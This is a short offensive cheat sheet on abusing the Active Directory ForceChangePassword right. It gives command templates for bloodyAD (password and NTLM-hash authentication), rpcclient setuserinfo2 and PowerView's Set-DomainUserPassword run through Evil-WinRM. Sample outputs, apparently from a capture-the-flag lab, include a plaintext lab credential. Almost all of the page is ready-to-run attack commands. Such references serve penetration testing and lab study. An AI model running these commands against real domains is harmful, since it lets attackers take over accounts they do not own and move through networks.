TLDRBins / ForceChangePassword


Change Target User Password (From Linux)

# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
bloodyAD -d object.local -u oliver -p 'c1cdfun_d2434' --host jenkins.object.local set password smith 'Test1234'
[+] Password changed successfully!

# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO

Ref: bloodyAD

rpcclient -U '<DOMAIN>/<USER>%<PASSWORD>' <TARGET> -c 'setuserinfo2 <TARGET_USER> 23 <NEW_PASSWORD>'
Sample Output: $ rpcclient -U 'object.local/oliver%c1cdfun_d2434' 10.10.11.132 -c 'setuserinfo2 smith 23 Test1234'

Change Target User Password (From Windows)

1. Import PowerView

. .\PowerView.ps1
Sample Output: *Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Create a Cred Object (runas) [Optional]

$username = '<DOMAIN>\<USER>'
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $password
Sample Output: TO-DO

3. Change Target User Password

$password = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
Sample Output: *Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force
# -Credential is only needed when the optional cred object from step 2 is used
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password -Credential $cred
Sample Output: *Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity gibdeon -AccountPassword $password